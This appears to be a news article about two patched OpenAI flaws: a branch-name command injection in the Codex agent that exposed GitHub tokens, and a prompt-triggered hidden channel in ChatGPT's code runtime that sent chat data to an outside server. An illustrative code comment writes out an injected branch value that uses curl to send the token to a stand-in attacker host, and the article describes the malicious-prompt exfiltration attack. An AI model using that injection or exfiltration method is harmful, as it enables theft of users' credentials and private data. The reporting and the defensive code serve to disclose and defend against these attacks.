OpenAI has fixed two flaws in its AI stack that could allow AI agents to move sensitive data in unintended ways.
The issues, disclosed by researchers at BeyondTrust and Check Point Research, affect the OpenAI Codex coding agent and ChatGPT’s code execution environment, respectively. One enabled GitHub token theft through command injection, while the other exposed a hidden channel for silently leaking user data.
Both bugs have now been patched, but researchers warn that giving AI tools autonomy to execute code and interact with external systems creates a long-term risk, allowing attackers to carry out malicious actions without ever breaking the model itself.
Codex command injection turns branch names into backdoors
Researchers at BeyondTrust found that Codex, OpenAI’s coding agent that executes tasks in cloud containers, was vulnerable to a command injection bug in its handling of the GitHub branch name parameter.
When Codex starts a task, it clones a repository and authenticates using a short-lived GitHub token. The issue stemmed from how it handled user-controlled input during this setup phase. Specifically, the branch name parameter was not properly sanitized, allowing attackers to inject arbitrary shell commands into the environment.
A maliciously crafted branch name could execute code inside the container, exposing the very token Codex used to access the repository. Researchers demonstrated that the token could then be exfiltrated via task output or external network requests.
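The vulnerability class is easiest to see in a short sketch. The code below is illustrative, not Codex's actual implementation: it contrasts interpolating a user-supplied branch name into a shell string (injectable) with passing it as a validated argument list (not). The repository URL, branch values, and the validation rule are assumptions for the example.

```python
import subprocess


def clone_unsafe(repo_url: str, branch: str) -> None:
    # VULNERABLE: the branch name is interpolated into a shell string, so a
    # value like "main; curl https://attacker.example/?t=$GITHUB_TOKEN"
    # terminates the git command and runs the attacker's command, which can
    # read the token from the container's environment.
    subprocess.run(f"git clone --branch {branch} {repo_url}", shell=True, check=True)


def clone_safe(repo_url: str, branch: str) -> None:
    # SAFER: reject branch names containing shell metacharacters, then pass
    # arguments as a list so no shell ever parses the value. (A real fix
    # would validate against git's full ref-name rules.)
    if not branch or any(c in branch for c in " ;&|$`\n"):
        raise ValueError(f"suspicious branch name: {branch!r}")
    subprocess.run(["git", "clone", "--branch", branch, repo_url], check=True)
```

Even with the list form, validating the input remains worthwhile: `--`-prefixed branch names could otherwise be misread as git options.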
This effectively turns a routine developer workflow into a potential credential theft vector. GitHub tokens often grant broad access to private repositories, making them highly valuable in supply chain attacks.
According to a BeyondTrust blog post, the issue was disclosed to OpenAI, which acted quickly to address it by tightening input validation around the vulnerable parameter and hardening how commands are constructed in the execution environment. The fix was rolled out before public disclosure, with no evidence of active exploitation reported, the post added.
Input validation failures appear to be increasingly common in AI-driven workflows, reviving classic command injection vulnerabilities in a new setting.
ChatGPT’s hidden outbound channel leaks user data
OpenAI has reportedly fixed a parallel bug in ChatGPT that goes beyond credential theft. Check Point researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could be triggered with a single malicious prompt.
This channel successfully bypassed the platform’s expected safeguards around external data sharing. Instead of requiring explicit user approval, the runtime could transmit data, such as chat messages, uploaded files, or generated outputs, to an external server without any visible alerts.
Check Point researchers demonstrated the attack by crafting a prompt that triggered this behavior, causing the runtime to package and transmit private chat data to an external server. In effect, a normal-looking conversation could be turned into a covert data exfiltration pipeline.
The same mechanism could also be abused by a backdoored or malicious custom GPT, allowing it to siphon off sensitive information without user awareness, the researchers said, adding that the channel could potentially be used to establish remote shell access within the execution environment.
While no active exploitation has been reported, the researchers say the implications for user privacy are significant. OpenAI fixed the issue around the same time as the Codex patch by tightening controls around outbound communication in the code execution environment.
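One common way to tighten outbound communication in a sandboxed runtime is an egress allowlist, where every outbound request is checked against approved destinations before it leaves the environment. The sketch below is a minimal illustration of that pattern, not OpenAI's implementation; the host list and function names are hypothetical.

```python
from urllib.parse import urlparse

# Hypothetical policy: hosts the sandboxed runtime may contact. Anything
# else, including an attacker-controlled server, is blocked by default.
ALLOWED_HOSTS = {"api.github.com", "pypi.org"}


def egress_allowed(url: str) -> bool:
    # Parse out the hostname and permit the request only if it matches the
    # allowlist exactly; unparseable URLs are denied.
    host = urlparse(url).hostname or ""
    return host in ALLOWED_HOSTS
```

A default-deny policy like this turns a silent exfiltration channel into a blocked request, regardless of what a malicious prompt or custom GPT asks the runtime to do.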
OpenAI did not immediately respond to CSO’s request for comment on either flaw.